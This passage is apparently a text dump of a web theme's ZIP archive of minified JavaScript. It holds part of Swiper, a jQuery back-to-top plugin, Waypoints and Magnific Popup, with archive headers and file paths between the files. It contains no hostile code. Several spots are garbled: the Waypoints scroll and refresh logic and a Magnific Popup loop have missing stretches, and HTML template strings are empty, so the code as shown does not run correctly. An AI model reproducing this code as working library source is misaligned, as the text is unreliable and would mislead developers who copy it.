.params.parallax.enabled&&e.parallax.setTransition(t)}}},{name:"zoom",params:{zoom:{enabled:!1,maxRatio:3,minRatio:1,toggle:!0,containerClass:"swiper-zoom-container",zoomedSlideClass:"swiper-slide-zoomed"}},create:function(){var e=this;M(e,{zoom:t({enabled:!1,scale:1,currentScale:1,isScaling:!1,gesture:{$slideEl:void 0,slideWidth:void 0,slideHeight:void 0,$imageEl:void 0,$imageWrapEl:void 0,maxRatio:3},image:{isTouched:void 0,isMoved:void 0,currentX:void 0,currentY:void 0,minX:void 0,minY:void 0,maxX:void 0,maxY:void 0,width:void 0,height:void 0,startX:void 0,startY:void 0,touchesStart:{},touchesCurrent:{}},velocity:{x:void 0,y:void 0,prevPositionX:void 0,prevPositionY:void 0,prevTime:void 0}},te)});var a=1;Object.defineProperty(e.zoom,"scale",{get:function(){return a},set:function(t){if(a!==t){var i=e.zoom.gesture.$imageEl?e.zoom.gesture.$imageEl[0]:void 0,s=e.zoom.gesture.$slideEl?e.zoom.gesture.$slideEl[0]:void 0;e.emit("zoomChange",t,i,s)}a=t}})},on:{init:function(e){e.params.zoom.enabled&&e.zoom.enable()},destroy:function(e){e.zoom.disable()},touchStart:function(e,t){e.zoom.enabled&&e.zoom.onTouchStart(t)},touchEnd:function(e,t){e.zoom.enabled&&e.zoom.onTouchEnd(t)},doubleTap:function(e,t){!e.animating&&e.params.zoom.enabled&&e.zoom.enabled&&e.params.zoom.toggle&&e.zoom.toggle(t)},transitionEnd:function(e){e.zoom.enabled&&e.params.zoom.enabled&&e.zoom.onTransitionEnd()},slideChange:function(e){e.zoom.enabled&&e.params.zoom.enabled&&e.params.cssMode&&e.zoom.onTransitionEnd()}}},{name:"lazy",params:{lazy:{checkInView:!1,enabled:!1,loadPrevNext:!1,loadPrevNextAmount:1,loadOnTransitionStart:!1,scrollingElement:"",elementClass:"swiper-lazy",loadingClass:"swiper-lazy-loading",loadedClass:"swiper-lazy-loaded",preloaderClass:"swiper-lazy-preloader"}},create:function(){M(this,{lazy:t({initialImageLoaded:!1},ae)})},on:{beforeInit:function(e){e.params.lazy.enabled&&e.params.preloadImages&&(e.params.preloadImages=!1)},init:function(e){e.params.lazy.enabled&&!e.params.loop&&0===e.params.initialSlide&&(e.params.lazy.checkInView?e.lazy.checkInViewOnLoad():e.lazy.load())},scroll:function(e){e.params.freeMode&&!e.params.freeModeSticky&&e.lazy.load()},"scrollbarDragMove resize _freeModeNoMomentumRelease":function(e){e.params.lazy.enabled&&e.lazy.load()},transitionStart:function(e){e.params.lazy.enabled&&(e.params.lazy.loadOnTransitionStart||!e.params.lazy.loadOnTransitionStart&&!e.lazy.initialImageLoaded)&&e.lazy.load()},transitionEnd:function(e){e.params.lazy.enabled&&!e.params.lazy.loadOnTransitionStart&&e.lazy.load()},slideChange:function(e){e.params.lazy.enabled&&e.params.cssMode&&e.lazy.load()}}},{name:"controller",params:{controller:{control:void 0,inverse:!1,by:"slide"}},create:function(){M(this,{controller:t({control:this.params.controller.control},ie)})},on:{update:function(e){e.controller.control&&e.controller.spline&&(e.controller.spline=void 0,delete e.controller.spline)},resize:function(e){e.controller.control&&e.controller.spline&&(e.controller.spline=void 0,delete e.controller.spline)},observerUpdate:function(e){e.controller.control&&e.controller.spline&&(e.controller.spline=void 0,delete e.controller.spline)},setTranslate:function(e,t,a){e.controller.control&&e.controller.setTranslate(t,a)},setTransition:function(e,t,a){e.controller.control&&e.controller.setTransition(t,a)}}},{name:"a11y",params:{a11y:{enabled:!0,notificationClass:"swiper-notification",prevSlideMessage:"Previous slide",nextSlideMessage:"Next slide",firstSlideMessage:"This is the first slide",lastSlideMessage:"This is the last slide",paginationBulletMessage:"Go to slide {{index}}",slideLabelMessage:"{{index}} / {{slidesLength}}",containerMessage:null,containerRoleDescriptionMessage:null,itemRoleDescriptionMessage:null,slideRole:"group"}},create:function(){M(this,{a11y:t({},se,{liveRegion:m('')})})},on:{afterInit:function(e){e.params.a11y.enabled&&(e.a11y.init(),e.a11y.updateNavigation())},toEdge:function(e){e.params.a11y.enabled&&e.a11y.updateNavigation()},fromEdge:function(e){e.params.a11y.enabled&&e.a11y.updateNavigation()},paginationUpdate:function(e){e.params.a11y.enabled&&e.a11y.updatePagination()},destroy:function(e){e.params.a11y.enabled&&e.a11y.destroy()}}},{name:"history",params:{history:{enabled:!1,root:"",replaceState:!1,key:"slides"}},create:function(){M(this,{history:t({},re)})},on:{init:function(e){e.params.history.enabled&&e.history.init()},destroy:function(e){e.params.history.enabled&&e.history.destroy()},transitionEnd:function(e){e.history.initialized&&e.history.setHistory(e.params.history.key,e.activeIndex)},slideChange:function(e){e.history.initialized&&e.params.cssMode&&e.history.setHistory(e.params.history.key,e.activeIndex)}}},{name:"hash-navigation",params:{hashNavigation:{enabled:!1,replaceState:!1,watchState:!1}},create:function(){M(this,{hashNavigation:t({initialized:!1},ne)})},on:{init:function(e){e.params.hashNavigation.enabled&&e.hashNavigation.init()},destroy:function(e){e.params.hashNavigation.enabled&&e.hashNavigation.destroy()},transitionEnd:function(e){e.hashNavigation.initialized&&e.hashNavigation.setHash()},slideChange:function(e){e.hashNavigation.initialized&&e.params.cssMode&&e.hashNavigation.setHash()}}},{name:"autoplay",params:{autoplay:{enabled:!1,delay:3e3,waitForTransition:!0,disableOnInteraction:!0,stopOnLastSlide:!1,reverseDirection:!1}},create:function(){M(this,{autoplay:t({},oe,{running:!1,paused:!1})})},on:{init:function(e){e.params.autoplay.enabled&&(e.autoplay.start(),r().addEventListener("visibilitychange",e.autoplay.onVisibilityChange))},beforeTransitionStart:function(e,t,a){e.autoplay.running&&(a||!e.params.autoplay.disableOnInteraction?e.autoplay.pause(t):e.autoplay.stop())},sliderFirstMove:function(e){e.autoplay.running&&(e.params.autoplay.disableOnInteraction?e.autoplay.stop():e.autoplay.pause())},touchEnd:function(e){e.params.cssMode&&e.autoplay.paused&&!e.params.autoplay.disableOnInteraction&&e.autoplay.run()},destroy:function(e){e.autoplay.running&&e.autoplay.stop(),r().removeEventListener("visibilitychange",e.autoplay.onVisibilityChange)}}},{name:"effect-fade",params:{fadeEffect:{crossFade:!1}},create:function(){M(this,{fadeEffect:t({},le)})},on:{beforeInit:function(e){if("fade"===e.params.effect){e.classNames.push(e.params.containerModifierClass+"fade");var t={slidesPerView:1,slidesPerColumn:1,slidesPerGroup:1,watchSlidesProgress:!0,spaceBetween:0,virtualTranslate:!0};C(e.params,t),C(e.originalParams,t)}},setTranslate:function(e){"fade"===e.params.effect&&e.fadeEffect.setTranslate()},setTransition:function(e,t){"fade"===e.params.effect&&e.fadeEffect.setTransition(t)}}},{name:"effect-cube",params:{cubeEffect:{slideShadows:!0,shadow:!0,shadowOffset:20,shadowScale:.94}},create:function(){M(this,{cubeEffect:t({},de)})},on:{beforeInit:function(e){if("cube"===e.params.effect){e.classNames.push(e.params.containerModifierClass+"cube"),e.classNames.push(e.params.containerModifierClass+"3d");var t={slidesPerView:1,slidesPerColumn:1,slidesPerGroup:1,watchSlidesProgress:!0,resistanceRatio:0,spaceBetween:0,centeredSlides:!1,virtualTranslate:!0};C(e.params,t),C(e.originalParams,t)}},setTranslate:function(e){"cube"===e.params.effect&&e.cubeEffect.setTranslate()},setTransition:function(e,t){"cube"===e.params.effect&&e.cubeEffect.setTransition(t)}}},{name:"effect-flip",params:{flipEffect:{slideShadows:!0,limitRotation:!0}},create:function(){M(this,{flipEffect:t({},pe)})},on:{beforeInit:function(e){if("flip"===e.params.effect){e.classNames.push(e.params.containerModifierClass+"flip"),e.classNames.push(e.params.containerModifierClass+"3d");var t={slidesPerView:1,slidesPerColumn:1,slidesPerGroup:1,watchSlidesProgress:!0,spaceBetween:0,virtualTranslate:!0};C(e.params,t),C(e.originalParams,t)}},setTranslate:function(e){"flip"===e.params.effect&&e.flipEffect.setTranslate()},setTransition:function(e,t){"flip"===e.params.effect&&e.flipEffect.setTransition(t)}}},{name:"effect-coverflow",params:{coverflowEffect:{rotate:50,stretch:0,depth:100,scale:1,modifier:1,slideShadows:!0}},create:function(){M(this,{coverflowEffect:t({},ce)})},on:{beforeInit:function(e){"coverflow"===e.params.effect&&(e.classNames.push(e.params.containerModifierClass+"coverflow"),e.classNames.push(e.params.containerModifierClass+"3d"),e.params.watchSlidesProgress=!0,e.originalParams.watchSlidesProgress=!0)},setTranslate:function(e){"coverflow"===e.params.effect&&e.coverflowEffect.setTranslate()},setTransition:function(e,t){"coverflow"===e.params.effect&&e.coverflowEffect.setTransition(t)}}},{name:"thumbs",params:{thumbs:{swiper:null,multipleActiveThumbs:!0,autoScrollOffset:0,slideThumbActiveClass:"swiper-slide-thumb-active",thumbsContainerClass:"swiper-container-thumbs"}},create:function(){M(this,{thumbs:t({swiper:null,initialized:!1},ue)})},on:{beforeInit:function(e){var t=e.params.thumbs;t&&t.swiper&&(e.thumbs.init(),e.thumbs.update(!0))},slideChange:function(e){e.thumbs.swiper&&e.thumbs.update()},update:function(e){e.thumbs.swiper&&e.thumbs.update()},resize:function(e){e.thumbs.swiper&&e.thumbs.update()},observerUpdate:function(e){e.thumbs.swiper&&e.thumbs.update()},setTransition:function(e,t){var a=e.thumbs.swiper;a&&a.setTransition(t)},beforeDestroy:function(e){var t=e.thumbs.swiper;t&&e.thumbs.swiperCreated&&t&&t.destroy()}}}];return F.use(he),F})); PK!Ru!! assets/js/jquery.ui.totop.min.jsnu[!function(o){o.fn.UItoTop=function(n){var i=!1,t=o.extend({text:"Back to Top",min:300,containerID:"back-top"},n),e="#"+t.containerID;window.innerWidth>1024&&(o("body").append(''+t.text+""),o(e).on("click.UItoTop",function(){return window.scrollTo({top:0,behavior:"smooth"}),o(e).removeClass("scroll-btn-visible"),!1}),o(window).on("scroll",function(){var n=o(window).scrollTop();n>t.min&&!i?(o(e).addClass("scroll-btn-visible"),i=!0):n<=t.min&&(o(e).removeClass("scroll-btn-visible"),i=!1)}))}}(jQuery);PK! J#J#!assets/js/jquery.waypoints.min.jsnu[/*! Waypoints - 4.0.1 Copyright © 2011-2016 Caleb Troughton Licensed under the MIT license. https://github.com/imakewebthings/waypoints/blob/master/licenses.txt */ !function(){"use strict";function t(o){if(!o)throw new Error("No options passed to Waypoint constructor");if(!o.element)throw new Error("No element option passed to Waypoint constructor");if(!o.handler)throw new Error("No handler option passed to Waypoint constructor");this.key="waypoint-"+e,this.options=t.Adapter.extend({},t.defaults,o),this.element=this.options.element,this.adapter=new t.Adapter(this.element),this.callback=o.handler,this.axis=this.options.horizontal?"horizontal":"vertical",this.enabled=this.options.enabled,this.triggerPoint=null,this.group=t.Group.findOrCreate({name:this.options.group,axis:this.axis}),this.context=t.Context.findOrCreateByElement(this.options.context),t.offsetAliases[this.options.offset]&&(this.options.offset=t.offsetAliases[this.options.offset]),this.group.add(this),this.context.add(this),i[this.key]=this,e+=1}var e=0,i={};t.prototype.queueTrigger=function(t){this.group.queueTrigger(this,t)},t.prototype.trigger=function(t){this.enabled&&this.callback&&this.callback.apply(this,t)},t.prototype.destroy=function(){this.context.remove(this),this.group.remove(this),delete i[this.key]},t.prototype.disable=function(){return this.enabled=!1,this},t.prototype.enable=function(){return this.context.refresh(),this.enabled=!0,this},t.prototype.next=function(){return this.group.next(this)},t.prototype.previous=function(){return this.group.previous(this)},t.invokeAll=function(t){var e=[];for(var o in i)e.push(i[o]);for(var n=0,r=e.length;r>n;n++)e[n][t]()},t.destroyAll=function(){t.invokeAll("destroy")},t.disableAll=function(){t.invokeAll("disable")},t.enableAll=function(){t.Context.refreshAll();for(var e in i)i[e].enabled=!0;return this},t.refreshAll=function(){t.Context.refreshAll()},t.viewportHeight=function(){return window.innerHeight||document.documentElement.clientHeight},t.viewportWidth=function(){return document.documentElement.clientWidth},t.adapters=[],t.defaults={context:window,continuous:!0,enabled:!0,group:"default",horizontal:!1,offset:0},t.offsetAliases={"bottom-in-view":function(){return this.context.innerHeight()-this.adapter.outerHeight()},"right-in-view":function(){return this.context.innerWidth()-this.adapter.outerWidth()}},window.Waypoint=t}(),function(){"use strict";function t(t){window.setTimeout(t,1e3/60)}function e(t){this.element=t,this.Adapter=n.Adapter,this.adapter=new this.Adapter(t),this.key="waypoint-context-"+i,this.didScroll=!1,this.didResize=!1,this.oldScroll={x:this.adapter.scrollLeft(),y:this.adapter.scrollTop()},this.waypoints={vertical:{},horizontal:{}},t.waypointContextKey=this.key,o[t.waypointContextKey]=this,i+=1,n.windowContext||(n.windowContext=!0,n.windowContext=new e(window)),this.createThrottledScrollHandler(),this.createThrottledResizeHandler()}var i=0,o={},n=window.Waypoint,r=window.onload;e.prototype.add=function(t){var e=t.options.horizontal?"horizontal":"vertical";this.waypoints[e][t.key]=t,this.refresh()},e.prototype.checkEmpty=function(){var t=this.Adapter.isEmptyObject(this.waypoints.horizontal),e=this.Adapter.isEmptyObject(this.waypoints.vertical),i=this.element==this.element.window;t&&e&&!i&&(this.adapter.off(".waypoints"),delete o[this.key])},e.prototype.createThrottledResizeHandler=function(){function t(){e.handleResize(),e.didResize=!1}var e=this;this.adapter.on("resize.waypoints",function(){e.didResize||(e.didResize=!0,n.requestAnimationFrame(t))})},e.prototype.createThrottledScrollHandler=function(){function t(){e.handleScroll(),e.didScroll=!1}var e=this;this.adapter.on("scroll.waypoints",function(){(!e.didScroll||n.isTouch)&&(e.didScroll=!0,n.requestAnimationFrame(t))})},e.prototype.handleResize=function(){n.Context.refreshAll()},e.prototype.handleScroll=function(){var t={},e={horizontal:{newScroll:this.adapter.scrollLeft(),oldScroll:this.oldScroll.x,forward:"right",backward:"left"},vertical:{newScroll:this.adapter.scrollTop(),oldScroll:this.oldScroll.y,forward:"down",backward:"up"}};for(var i in e){var o=e[i],n=o.newScroll>o.oldScroll,r=n?o.forward:o.backward;for(var s in this.waypoints[i]){var a=this.waypoints[i][s];if(null!==a.triggerPoint){var l=o.oldScroll=a.triggerPoint,p=l&&h,u=!l&&!h;(p||u)&&(a.queueTrigger(r),t[a.group.id]=a.group)}}}for(var c in t)t[c].flushTriggers();this.oldScroll={x:e.horizontal.newScroll,y:e.vertical.newScroll}},e.prototype.innerHeight=function(){return this.element==this.element.window?n.viewportHeight():this.adapter.innerHeight()},e.prototype.remove=function(t){delete this.waypoints[t.axis][t.key],this.checkEmpty()},e.prototype.innerWidth=function(){return this.element==this.element.window?n.viewportWidth():this.adapter.innerWidth()},e.prototype.destroy=function(){var t=[];for(var e in this.waypoints)for(var i in this.waypoints[e])t.push(this.waypoints[e][i]);for(var o=0,n=t.length;n>o;o++)t[o].destroy()},e.prototype.refresh=function(){var t,e=this.element==this.element.window,i=e?void 0:this.adapter.offset(),o={};this.handleScroll(),t={horizontal:{contextOffset:e?0:i.left,contextScroll:e?0:this.oldScroll.x,contextDimension:this.innerWidth(),oldScroll:this.oldScroll.x,forward:"right",backward:"left",offsetProp:"left"},vertical:{contextOffset:e?0:i.top,contextScroll:e?0:this.oldScroll.y,contextDimension:this.innerHeight(),oldScroll:this.oldScroll.y,forward:"down",backward:"up",offsetProp:"top"}};for(var r in t){var s=t[r];for(var a in this.waypoints[r]){var l,h,p,u,c,d=this.waypoints[r][a],f=d.options.offset,w=d.triggerPoint,y=0,g=null==w;d.element!==d.element.window&&(y=d.adapter.offset()[s.offsetProp]),"function"==typeof f?f=f.apply(d):"string"==typeof f&&(f=parseFloat(f),d.options.offset.indexOf("%")>-1&&(f=Math.ceil(s.contextDimension*f/100))),l=s.contextScroll-s.contextOffset,d.triggerPoint=Math.floor(y+l-f),h=w=s.oldScroll,u=h&&p,c=!h&&!p,!g&&u?(d.queueTrigger(s.backward),o[d.group.id]=d.group):!g&&c?(d.queueTrigger(s.forward),o[d.group.id]=d.group):g&&s.oldScroll>=d.triggerPoint&&(d.queueTrigger(s.forward),o[d.group.id]=d.group)}}return n.requestAnimationFrame(function(){for(var t in o)o[t].flushTriggers()}),this},e.findOrCreateByElement=function(t){return e.findByElement(t)||new e(t)},e.refreshAll=function(){for(var t in o)o[t].refresh()},e.findByElement=function(t){return o[t.waypointContextKey]},window.onload=function(){r&&r(),e.refreshAll()},n.requestAnimationFrame=function(e){var i=window.requestAnimationFrame||window.mozRequestAnimationFrame||window.webkitRequestAnimationFrame||t;i.call(window,e)},n.Context=e}(),function(){"use strict";function t(t,e){return t.triggerPoint-e.triggerPoint}function e(t,e){return e.triggerPoint-t.triggerPoint}function i(t){this.name=t.name,this.axis=t.axis,this.id=this.name+"-"+this.axis,this.waypoints=[],this.clearTriggerQueues(),o[this.axis][this.name]=this}var o={vertical:{},horizontal:{}},n=window.Waypoint;i.prototype.add=function(t){this.waypoints.push(t)},i.prototype.clearTriggerQueues=function(){this.triggerQueues={up:[],down:[],left:[],right:[]}},i.prototype.flushTriggers=function(){for(var i in this.triggerQueues){var o=this.triggerQueues[i],n="up"===i||"left"===i;o.sort(n?e:t);for(var r=0,s=o.length;s>r;r+=1){var a=o[r];(a.options.continuous||r===o.length-1)&&a.trigger([i])}}this.clearTriggerQueues()},i.prototype.next=function(e){this.waypoints.sort(t);var i=n.Adapter.inArray(e,this.waypoints),o=i===this.waypoints.length-1;return o?null:this.waypoints[i+1]},i.prototype.previous=function(e){this.waypoints.sort(t);var i=n.Adapter.inArray(e,this.waypoints);return i?this.waypoints[i-1]:null},i.prototype.queueTrigger=function(t,e){this.triggerQueues[e].push(t)},i.prototype.remove=function(t){var e=n.Adapter.inArray(t,this.waypoints);e>-1&&this.waypoints.splice(e,1)},i.prototype.first=function(){return this.waypoints[0]},i.prototype.last=function(){return this.waypoints[this.waypoints.length-1]},i.findOrCreate=function(t){return o[t.axis][t.name]||new i(t)},n.Group=i}(),function(){"use strict";function t(t){this.$element=e(t)}var e=window.jQuery,i=window.Waypoint;e.each(["innerHeight","innerWidth","off","offset","on","outerHeight","outerWidth","scrollLeft","scrollTop"],function(e,i){t.prototype[i]=function(){var t=Array.prototype.slice.call(arguments);return this.$element[i].apply(this.$element,t)}}),e.each(["extend","inArray","isEmptyObject"],function(i,o){t[o]=e[o]}),i.adapters.push({name:"jquery",Adapter:t}),i.Adapter=t}(),function(){"use strict";function t(t){return function(){var i=[],o=arguments[0];return t.isFunction(arguments[0])&&(o=t.extend({},arguments[1]),o.handler=arguments[0]),this.each(function(){var n=t.extend({},o,{element:this});"string"==typeof n.context&&(n.context=t(this).closest(n.context)[0]),i.push(new e(n))}),i}}var e=window.Waypoint;window.jQuery&&(window.jQuery.fn.waypoint=t(window.jQuery)),window.Zepto&&(window.Zepto.fn.waypoint=t(window.Zepto))}();PK!NNassets/js/jquery.mp.min.jsnu[/*! Magnific Popup - v1.1.0 */ !function(a){"function"==typeof define&&define.amd?define(["jquery"],a):a("object"==typeof exports?require("jquery"):window.jQuery||window.Zepto)}(function(a){var b,c,d,e,f,g,h="Close",i="BeforeClose",j="AfterClose",k="BeforeAppend",l="MarkupParse",m="Open",n="Change",o="mfp",p="."+o,q="mfp-ready",r="mfp-removing",s="mfp-prevent-close",t=function(){},u=!!window.jQuery,v=a(window),w=function(a,c){b.ev.on(o+a+p,c)},x=function(b,c,d,e){var f=document.createElement("div");return f.className="mfp-"+b,d&&(f.innerHTML=d),e?c&&c.appendChild(f):(f=a(f),c&&f.appendTo(c)),f},y=function(c,d){b.ev.triggerHandler(o+c,d),b.st.callbacks&&(c=c.charAt(0).toLowerCase()+c.slice(1),b.st.callbacks[c]&&b.st.callbacks[c].apply(b,a.isArray(d)?d:[d]))},z=function(c){return c===g&&b.currTemplate.closeBtn||(b.currTemplate.closeBtn=a(b.st.closeMarkup.replace("%title%",b.st.tClose)),g=c),b.currTemplate.closeBtn},A=function(){a.magnificPopup.instance||(b=new t,b.init(),a.magnificPopup.instance=b)},B=function(){var a=document.createElement("p").style,b=["ms","O","Moz","Webkit"];if(void 0!==a.transition)return!0;for(;b.length;)if(b.pop()+"Transition"in a)return!0;return!1};t.prototype={constructor:t,init:function(){var c=navigator.appVersion;b.isLowIE=b.isIE8=document.all&&!document.addEventListener,b.isAndroid=/android/gi.test(c),b.isIOS=/iphone|ipad|ipod/gi.test(c),b.supportsTransition=B(),b.probablyMobile=b.isAndroid||b.isIOS||/(Opera Mini)|Kindle|webOS|BlackBerry|(Opera Mobi)|(Windows Phone)|IEMobile/i.test(navigator.userAgent),d=a(document),b.popupsCache={}},open:function(c){var e;if(c.isObj===!1){b.items=c.items.toArray(),b.index=0;var g,h=c.items;for(e=0;e(a||v.height())},_setFocus:function(){(b.st.focus?b.content.find(b.st.focus).eq(0):b.wrap).focus()},_onFocusIn:function(c){return c.target===b.wrap[0]||a.contains(b.wrap[0],c.target)?void 0:(b._setFocus(),!1)},_parseMarkup:function(b,c,d){var e;d.data&&(c=a.extend(d.data,c)),y(l,[b,c,d]),a.each(c,function(c,d){if(void 0===d||d===!1)return!0;if(e=c.split("_"),e.length>1){var f=b.find(p+"-"+e[0]);if(f.length>0){var g=e[1];"replaceWith"===g?f[0]!==d[0]&&f.replaceWith(d):"img"===g?f.is("img")?f.attr("src",d):f.replaceWith(a("").attr("src",d).attr("class",f.attr("class"))):f.attr(e[1],d)}}else b.find(p+"-"+c).html(d)})},_getScrollbarSize:function(){if(void 0===b.scrollbarSize){var a=document.createElement("div");a.style.cssText="width: 99px; height: 99px; overflow: scroll; position: absolute; top: -9999px;",document.body.appendChild(a),b.scrollbarSize=a.offsetWidth-a.clientWidth,document.body.removeChild(a)}return b.scrollbarSize}},a.magnificPopup={instance:null,proto:t.prototype,modules:[],open:function(b,c){return A(),b=b?a.extend(!0,{},b):{},b.isObj=!0,b.index=c||0,this.instance.open(b)},close:function(){return a.magnificPopup.instance&&a.magnificPopup.instance.close()},registerModule:function(b,c){c.options&&(a.magnificPopup.defaults[b]=c.options),a.extend(this.proto,c.proto),this.modules.push(b)},defaults:{disableOn:0,key:null,midClick:!1,mainClass:"",preloader:!0,focus:"",closeOnContentClick:!1,closeOnBgClick:!0,closeBtnInside:!0,showCloseBtn:!0,enableEscapeKey:!0,modal:!1,alignTop:!1,removalDelay:0,prependTo:null,fixedContentPos:"auto",fixedBgPos:"auto",overflowY:"auto",closeMarkup:'',tClose:"Close (Esc)",tLoading:"Loading...",autoFocusLast:!0}},a.fn.magnificPopup=function(c){A();var d=a(this);if("string"==typeof c)if("open"===c){var e,f=u?d.data("magnificPopup"):d[0].magnificPopup,g=parseInt(arguments[1],10)||0;f.items?e=f.items[g]:(e=d,f.delegate&&(e=e.find(f.delegate)),e=e.eq(g)),b._openClick({mfpEl:e},d,f)}else b.isOpen&&b[c].apply(b,Array.prototype.slice.call(arguments,1));else c=a.extend(!0,{},c),u?d.data("magnificPopup",c):d[0].magnificPopup=c,b.addGroup(d,c);return d};var C,D,E,F="inline",G=function(){E&&(D.after(E.addClass(C)).detach(),E=null)};a.magnificPopup.registerModule(F,{options:{hiddenClass:"hide",markup:"",tNotFound:"Content not found"},proto:{initInline:function(){b.types.push(F),w(h+"."+F,function(){G()})},getInline:function(c,d){if(G(),c.src){var e=b.st.inline,f=a(c.src);if(f.length){var g=f[0].parentNode;g&&g.tagName&&(D||(C=e.hiddenClass,D=x(C),C="mfp-"+C),E=f.after(D).detach().removeClass(C)),b.updateStatus("ready")}else b.updateStatus("error",e.tNotFound),f=a("
    ");return c.inlineElement=f,f}return b.updateStatus("ready"),b._parseMarkup(d,{},c),d}}});var H,I="ajax",J=function(){H&&a(document.body).removeClass(H)},K=function(){J(),b.req&&b.req.abort()};a.magnificPopup.registerModule(I,{options:{settings:null,cursor:"mfp-ajax-cur",tError:'The content could not be loaded.'},proto:{initAjax:function(){b.types.push(I),H=b.st.ajax.cursor,w(h+"."+I,K),w("BeforeChange."+I,K)},getAjax:function(c){H&&a(document.body).addClass(H),b.updateStatus("loading");var d=a.extend({url:c.src,success:function(d,e,f){var g={data:d,xhr:f};y("ParseAjax",g),b.appendContent(a(g.data),I),c.finished=!0,J(),b._setFocus(),setTimeout(function(){b.wrap.addClass(q)},16),b.updateStatus("ready"),y("AjaxContentAdded")},error:function(){J(),c.finished=c.loadError=!0,b.updateStatus("error",b.st.ajax.tError.replace("%url%",c.src))}},b.st.ajax.settings);return b.req=a.ajax(d),""}}});var L,M=function(c){if(c.data&&void 0!==c.data.title)return c.data.title;var d=b.st.image.titleSrc;if(d){if(a.isFunction(d))return d.call(b,c);if(c.el)return c.el.attr(d)||""}return""};a.magnificPopup.registerModule("image",{options:{markup:'
    ',cursor:"mfp-zoom-out-cur",titleSrc:"title",verticalFit:!0,tError:'The image could not be loaded.'},proto:{initImage:function(){var c=b.st.image,d=".image";b.types.push("image"),w(m+d,function(){"image"===b.currItem.type&&c.cursor&&a(document.body).addClass(c.cursor)}),w(h+d,function(){c.cursor&&a(document.body).removeClass(c.cursor),v.off("resize"+p)}),w("Resize"+d,b.resizeImage),b.isLowIE&&w("AfterChange",b.resizeImage)},resizeImage:function(){var a=b.currItem;if(a&&a.img&&b.st.image.verticalFit){var c=0;b.isLowIE&&(c=parseInt(a.img.css("padding-top"),10)+parseInt(a.img.css("padding-bottom"),10)),a.img.css("max-height",b.wH-c)}},_onImageHasSize:function(a){a.img&&(a.hasSize=!0,L&&clearInterval(L),a.isCheckingImgSize=!1,y("ImageHasSize",a),a.imgHidden&&(b.content&&b.content.removeClass("mfp-loading"),a.imgHidden=!1))},findImageSize:function(a){var c=0,d=a.img[0],e=function(f){L&&clearInterval(L),L=setInterval(function(){return d.naturalWidth>0?void b._onImageHasSize(a):(c>200&&clearInterval(L),c++,void(3===c?e(10):40===c?e(50):100===c&&e(500)))},f)};e(1)},getImage:function(c,d){var e=0,f=function(){c&&(c.img[0].complete?(c.img.off(".mfploader"),c===b.currItem&&(b._onImageHasSize(c),b.updateStatus("ready")),c.hasSize=!0,c.loaded=!0,y("ImageLoadComplete")):(e++,200>e?setTimeout(f,100):g()))},g=function(){c&&(c.img.off(".mfploader"),c===b.currItem&&(b._onImageHasSize(c),b.updateStatus("error",h.tError.replace("%url%",c.src))),c.hasSize=!0,c.loaded=!0,c.loadError=!0)},h=b.st.image,i=d.find(".mfp-img");if(i.length){var j=document.createElement("img");j.className="mfp-img",c.el&&c.el.find("img").length&&(j.alt=c.el.find("img").attr("alt")),c.img=a(j).on("load.mfploader",f).on("error.mfploader",g),j.src=c.src,i.is("img")&&(c.img=c.img.clone()),j=c.img[0],j.naturalWidth>0?c.hasSize=!0:j.width||(c.hasSize=!1)}return b._parseMarkup(d,{title:M(c),img_replaceWith:c.img},c),b.resizeImage(),c.hasSize?(L&&clearInterval(L),c.loadError?(d.addClass("mfp-loading"),b.updateStatus("error",h.tError.replace("%url%",c.src))):(d.removeClass("mfp-loading"),b.updateStatus("ready")),d):(b.updateStatus("loading"),c.loading=!0,c.hasSize||(c.imgHidden=!0,d.addClass("mfp-loading"),b.findImageSize(c)),d)}}});var N,O=function(){return void 0===N&&(N=void 0!==document.createElement("p").style.MozTransform),N};a.magnificPopup.registerModule("zoom",{options:{enabled:!1,easing:"ease-in-out",duration:300,opener:function(a){return a.is("img")?a:a.find("img")}},proto:{initZoom:function(){var a,c=b.st.zoom,d=".zoom";if(c.enabled&&b.supportsTransition){var e,f,g=c.duration,j=function(a){var b=a.clone().removeAttr("style").removeAttr("class").addClass("mfp-animated-image"),d="all "+c.duration/1e3+"s "+c.easing,e={position:"fixed",zIndex:9999,left:0,top:0,"-webkit-backface-visibility":"hidden"},f="transition";return e["-webkit-"+f]=e["-moz-"+f]=e["-o-"+f]=e[f]=d,b.css(e),b},k=function(){b.content.css("visibility","visible")};w("BuildControls"+d,function(){if(b._allowZoom()){if(clearTimeout(e),b.content.css("visibility","hidden"),a=b._getItemToZoom(),!a)return void k();f=j(a),f.css(b._getOffset()),b.wrap.append(f),e=setTimeout(function(){f.css(b._getOffset(!0)),e=setTimeout(function(){k(),setTimeout(function(){f.remove(),a=f=null,y("ZoomAnimationEnded")},16)},g)},16)}}),w(i+d,function(){if(b._allowZoom()){if(clearTimeout(e),b.st.removalDelay=g,!a){if(a=b._getItemToZoom(),!a)return;f=j(a)}f.css(b._getOffset(!0)),b.wrap.append(f),b.content.css("visibility","hidden"),setTimeout(function(){f.css(b._getOffset())},16)}}),w(h+d,function(){b._allowZoom()&&(k(),f&&f.remove(),a=null)})}},_allowZoom:function(){return"image"===b.currItem.type},_getItemToZoom:function(){return b.currItem.hasSize?b.currItem.img:!1},_getOffset:function(c){var d;d=c?b.currItem.img:b.st.zoom.opener(b.currItem.el||b.currItem);var e=d.offset(),f=parseInt(d.css("padding-top"),10),g=parseInt(d.css("padding-bottom"),10);e.top-=a(window).scrollTop()-f;var h={width:d.width(),height:(u?d.innerHeight():d[0].offsetHeight)-g-f};return O()?h["-moz-transform"]=h.transform="translate("+e.left+"px,"+e.top+"px)":(h.left=e.left,h.top=e.top),h}}});var P="iframe",Q="//about:blank",R=function(a){if(b.currTemplate[P]){var c=b.currTemplate[P].find("iframe");c.length&&(a||(c[0].src=Q),b.isIE8&&c.css("display",a?"block":"none"))}};a.magnificPopup.registerModule(P,{options:{markup:'
